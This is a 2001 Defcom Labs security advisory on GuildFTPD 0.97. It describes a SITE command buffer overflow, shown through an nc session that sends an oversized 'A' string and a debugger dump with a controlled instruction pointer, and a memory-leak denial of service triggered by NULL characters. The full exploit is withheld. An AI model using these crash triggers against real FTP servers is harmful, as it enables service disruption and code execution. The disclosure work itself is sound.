Related information

Directory traversal in multiple FTP servers

Vulnerability for Platinum FTP version 1.0.11

[immune advisory] Mulitple vulnerabilities found in BisonFTP

Directory traversal vulnerabilities found in NITE ftp-server version 1.83

Vulnerabilties in Xynph FTP Server 1.0

From:	andreas junestam <andreas.junestam_(at)_defcom.com>
Date:	29.05.2001
Subject:	def-2001-27: GuildFTPD Buffer Overflow and Memory Leak DoS

======================================================================
                 Defcom Labs Advisory def-2001-27

              GuildFTPD Buffer Overflow and Memory Leak DoS

Author: Andreas Junestam <andreas@defcom.com>
Co-Author: Janne Sarendal <janne@defcom.com>
Release Date: 2001-05-22
======================================================================
------------------------=[Brief Description]=-------------------------
GuildFTPD contains two different problems:
1. Buffer overrun in the SITE command with the ability to execute
  arbitrary code
2. A memory leak in the input parsing code

------------------------=[Affected Systems]=--------------------------
- GuildFtpd v0.97 (probably earlier versions too)

----------------------=[Detailed Description]=------------------------
* SITE command Buffer Overflow
 All the SITE commands are handled in a dll(sitecmd.dll) which suffers
 from a buffer overflow. By sending a site command greater than 261
 bytes, a buffer will overflow and it is possible to execute
 arbitrary code. We have choosen not to include the working exploit.

 C:\>nc 127.0.0.1 21
 220-GuildFTPD FTP Server (c) 1999,2000
 220-Version 0.97
 220 Please enter your name:
 user a
 331 User name okay, Need password.
 pass a
 230 User logged in.
 site AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

 Access violation - code c0000005 (first chance)
 eax=01450000 ebx=00000001 ecx=00000000 edx=00130608 esi=10030000
edi=009ed9e0
 eip=41414141 esp=01bcf9b4 ebp=10030000 iopl=0         nv up ei pl nz
na po nc
 cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000            
efl=00010206

* Memory Leak DoS
 The input parsing code in GuildFTPD contains a memory leak that will
 trigger if you send it a request containing a NULL(0x0) character.
 GuildFTPD will still answer new requests, but, eventually the server
 will run out of memory and the machine will crash.

---------------------------=[Workaround]=-----------------------------
None for the moment

-------------------------=[Vendor Response]=--------------------------
This issue was brought to the developer's attention on the 24th of
April,
2001, no response so far.

======================================================================
           This release was brought to you by Defcom Labs UK

             labs@defcom.com             www.defcom.com
======================================================================